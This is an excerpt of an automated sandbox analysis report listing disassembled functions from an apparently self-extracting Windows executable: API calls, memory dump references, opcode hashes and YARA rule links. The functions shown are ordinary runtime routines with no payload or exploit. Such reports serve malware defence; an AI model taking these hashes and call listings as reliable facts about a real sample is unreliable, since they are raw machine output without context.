SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00347760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003499F9

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 053224530d5075e5f20e056c04af0bc71f212666a6a5ecaf4321dea624845d2f
Instruction ID: 2bdc9f1756baae68ab89f8175e135be97fc640c62aaf0c40a289c93b35dfac92
Opcode Fuzzy Hash: 053224530d5075e5f20e056c04af0bc71f212666a6a5ecaf4321dea624845d2f
Instruction Fuzzy Hash: 85310030544345AFE7329F24CC46BDBBBD8BB05320F210B1AF9A59A1D1D3A4A984CB91

Function 0035B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035B58A
IsDialogMessageW.USER32(00010466,?), ref: 0035B59E
TranslateMessage.USER32(?), ref: 0035B5AC
DispatchMessageW.USER32(?), ref: 0035B5B6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 0f08e9776200b0147efc733f7e5ac6f17c2d87516c3ddeafc5ac3ebecbf3ada0
Instruction ID: cdd8129236dc6f7d568a06dd050caf8e6af0fc4e4865d47bfa66ac2f20aced4a
Opcode Fuzzy Hash: 0f08e9776200b0147efc733f7e5ac6f17c2d87516c3ddeafc5ac3ebecbf3ada0
Instruction Fuzzy Hash: 0CF0D671A01119ABCB21DBE5DC4DDEBBFBCEE06391B404515B916D2010FB34D609CBB0

Function 0035ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0035ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0035ABF9

Part of subcall function 00351FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0034C116,00000000,.exe,?,?,00000800,?,?,?,00358E3C), ref: 00351FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0035ABE9

Strings

EDIT, xrefs: 0035ABCD, 0035ABD8, 0035ABE5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 950d31ad75dafae6c20c83bdf8c311ebd3bd5874649ec89800f784cc6a332aae
Instruction ID: ca560cf61358bebbcb363efac2bcfd7097f89314ecb448ecd495e00ffffbf364
Opcode Fuzzy Hash: 950d31ad75dafae6c20c83bdf8c311ebd3bd5874649ec89800f784cc6a332aae
Instruction Fuzzy Hash: F3F0E23260162876DB2296649C09F9B72AC9B42B01F094111BE05A2090D760EA45C5F6

Function 0035DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035DC30

Strings

sfxcmd, xrefs: 0035DBEF
sfxpar, xrefs: 0035DC2B

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c60e59f7ec35e28c39cee3324cfd6b2c36625e3229962e2270a0ab18f6e64a50
Instruction ID: 3d13cdb85715f39db6a59476fed648269fb520e8bb9bbc22b2e3407a9b6c5f56
Opcode Fuzzy Hash: c60e59f7ec35e28c39cee3324cfd6b2c36625e3229962e2270a0ab18f6e64a50
Instruction Fuzzy Hash: 9AF0A7B2405224A6CB372F95CC06FEA375CAF04783B440411FD8999161D6F48984D6A1

Function 00349785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00349795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003497AD
GetLastError.KERNEL32 ref: 003497DF
GetLastError.KERNEL32 ref: 003497FE

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: af3c4ba6c06e9bcb7ee1578601ea28497e867b99241149e5f2b291a96303cc17
Instruction ID: 84a74d7c45debe8279ae0c514bb18f146e223298e1bbb1c8620dfddee021194a
Opcode Fuzzy Hash: af3c4ba6c06e9bcb7ee1578601ea28497e867b99241149e5f2b291a96303cc17
Instruction Fuzzy Hash: AB117030910204EBDF225F68C804B6B3BEDFB52320F11862BF42A8D590D774AE84EB61

Function 0036AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00363F73,00000000,00000000,?,0036ACDB,00363F73,00000000,00000000,00000000,?,0036AED8,00000006,FlsSetValue), ref: 0036AD66
GetLastError.KERNEL32(?,0036ACDB,00363F73,00000000,00000000,00000000,?,0036AED8,00000006,FlsSetValue,00377970,FlsSetValue,00000000,00000364,?,003698B7), ref: 0036AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036ACDB,00363F73,00000000,00000000,00000000,?,0036AED8,00000006,FlsSetValue,00377970,FlsSetValue,00000000), ref: 0036AD80

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7adb16a622d50dd241d3ae49c7a5deea2cb021e618155e2fbfe8ecd155359be2
Instruction ID: 12798e3732fc91086a1c965660df20c3e699dd010d91be3f8d8898cd972f03d3
Opcode Fuzzy Hash: 7adb16a622d50dd241d3ae49c7a5deea2cb021e618155e2fbfe8ecd155359be2
Instruction Fuzzy Hash: B301F736605A26AFC7338A6CDC54A977B5CEF057A2B124720F90AE7564DB20D8418EE1

Function 0036BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 003697E5: GetLastError.KERNEL32(?,00381030,00364674,00381030,?,?,00363F73,00000050,?,00381030,00000200), ref: 003697E9
Part of subcall function 003697E5: _free.LIBCMT ref: 0036981C
Part of subcall function 003697E5: SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 0036985D
Part of subcall function 003697E5: _abort.LIBCMT ref: 00369863

Part of subcall function 0036BB4E: _abort.LIBCMT ref: 0036BB80
Part of subcall function 0036BB4E: _free.LIBCMT ref: 0036BBB4

Part of subcall function 0036B7BB: GetOEMCP.KERNEL32(00000000,?,?,0036BA44,?), ref: 0036B7E6

_free.LIBCMT ref: 0036BA9F
_free.LIBCMT ref: 0036BAD5

Strings

p7, xrefs: 0036BAC9

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p7
API String ID: 2991157371-2520287851
Opcode ID: 020197aca010107a63504562970554fbc07ca7390692b179f19f5ef5c7a821b2
Instruction ID: a507af8225aa720f0e984214eba4cf3d8523ed37a7d9f4d0946dc7092ae60baf
Opcode Fuzzy Hash: 020197aca010107a63504562970554fbc07ca7390692b179f19f5ef5c7a821b2
Instruction Fuzzy Hash: A531C431904209AFDB12EFA8D441B9DF7F9EF45324F218199E504DB2A6EB729D80DF50

Function 0035E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519
25, xrefs: 0035E532

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 25$PDu<5
API String ID: 1269201914-3138244922
Opcode ID: acbac1fd4be254615316ee7abd1ce28694d4a829bbf02117e615de9a4eb72b71
Instruction ID: 1602ecf5acbada1038275a86fa1a35e2a178e9035fa2f29e5576bc2e65cdf19d
Opcode Fuzzy Hash: acbac1fd4be254615316ee7abd1ce28694d4a829bbf02117e615de9a4eb72b71
Instruction Fuzzy Hash: 1BB012DA2680407D310F91185C02E3B010CC1C3F12330942FFC19C4490F8404E080531

Function 0035E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519
(5, xrefs: 0035E528

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (5$PDu<5
API String ID: 1269201914-2658178846
Opcode ID: 38aa51b89cc12da3439d35156fa4cbd360084188aa627dba94023a8765b5bdfb
Instruction ID: 909d9a844e86f167d5030be3a7744d9edd942718aac74d486f122333ebb16c1b
Opcode Fuzzy Hash: 38aa51b89cc12da3439d35156fa4cbd360084188aa627dba94023a8765b5bdfb
Instruction Fuzzy Hash: E6B012DA2680807C310F91285D03D3B050CC1C3F12330D42FFC19C4490F8404E090431

Function 00349F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0034D343,00000001,?,?,?,00000000,0035551D,?,?,?), ref: 00349F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0035551D,?,?,?,?,?,00354FC7,?), ref: 00349FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0034D343,00000001,?,?), ref: 0034A011

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 1bea692a5809f0717e42d89d525800f53d6ae1e4e346e32382838ecc62d03baa
Instruction ID: f2107754895f21b04aafced07fe268ff4e1a96794c9a0a47276347577c4177a8
Opcode Fuzzy Hash: 1bea692a5809f0717e42d89d525800f53d6ae1e4e346e32382838ecc62d03baa
Instruction Fuzzy Hash: D0318D31248305AFDB16CF20D818BAB77E9FB85715F04491DF9859F290CB75AD88CBA2

Function 0034A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0034C27E: _wcslen.LIBCMT ref: 0034C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A30C
GetLastError.KERNEL32(?,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A329

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: d2b8870d722a67aac655687c5e60ef5c7585d27aaa69fae55babc89cac1cfda1
Instruction ID: 8a71d38058e75d781c005d8812e2c51cf74d402cc7101ad9eb1541bdd25d0198
Opcode Fuzzy Hash: d2b8870d722a67aac655687c5e60ef5c7585d27aaa69fae55babc89cac1cfda1
Instruction Fuzzy Hash: 2201F536141A106AEF23AF715C09BEE32CC9F09380F040414F802EE081E794EA8196B2

Function 0036B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0036B8B8

Strings

, xrefs: 0036B8FD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 7519816b83c9901204fd5643292b8e7886f77b56f194ae91c5c5f7c32d87f1ed
Instruction ID: 21ca3fcef72534635b1f22de398dad8e4f118cc0019849d94efb1f696f799e08
Opcode Fuzzy Hash: 7519816b83c9901204fd5643292b8e7886f77b56f194ae91c5c5f7c32d87f1ed
Instruction Fuzzy Hash: B141C57050428C9ADB238E68CC84BE6FBEDEB55308F1444EDE69AC7146D335AA85DF60

Function 0036AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0036AFDD

Strings

LCMapStringEx, xrefs: 0036AF7D, 0036AF87

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 0a285f0c8668fbd3e1d5583124b491dd27b85c7592bd67b29938b439cb3a2b9e
Instruction ID: d27a38308a07fefc941aa8e937f752f40b44f982236e56171ae3f1b3b30dd7fa
Opcode Fuzzy Hash: 0a285f0c8668fbd3e1d5583124b491dd27b85c7592bd67b29938b439cb3a2b9e
Instruction Fuzzy Hash: 7101E532505209BBCF13AFA0DC06DEE7FA6EF09750F018154FE186A161CB368A71AF91

Function 0036AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0036A56F), ref: 0036AF55

Strings

InitializeCriticalSectionEx, xrefs: 0036AF1B, 0036AF25

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: a91416e1b59f35192efbe76e776e2631855f5f76bdc969ba1dfc330839c36c83
Instruction ID: f35232174e4a0eb67ba5b2341c1d539670ff3f2fd486b48697563d2c52459313
Opcode Fuzzy Hash: a91416e1b59f35192efbe76e776e2631855f5f76bdc969ba1dfc330839c36c83
Instruction Fuzzy Hash: 7BF0B431646218BFCB236F54CC02C9DBF65EF05711F418064FD0CAA261DB314A10EB96

Function 0036ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0036ADEE

Strings

FlsAlloc, xrefs: 0036ADC0, 0036ADCA

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 9aad63deba46f14fd4171fa96aec95a960a727700bf6bcbb242f3325587647fc
Instruction ID: 5b1d7c656cbfa3300a9a7177f302de02818eb85d7e7fccba8e985bf5b51801df
Opcode Fuzzy Hash: 9aad63deba46f14fd4171fa96aec95a960a727700bf6bcbb242f3325587647fc
Instruction Fuzzy Hash: 3CE0AB30646208BBC323AB24CC12DAEBB58DB09721F0180A8FD0CB7340CE344E408AC6

Function 0035E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: a9a62140aac3b69de499788130365206a4b5a4cf3a4e371223b9c3b2d416a465
Instruction ID: 7c7e46af5e8b95a26c88c22038077a4aea57aeffc9ec9608ba1c9d6703962b83
Opcode Fuzzy Hash: a9a62140aac3b69de499788130365206a4b5a4cf3a4e371223b9c3b2d416a465
Instruction Fuzzy Hash: 6FB012D5268000BC320F62469E02C37020DC5C3F22330C03FFC19C8690D840AF0D0431

Function 0035E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
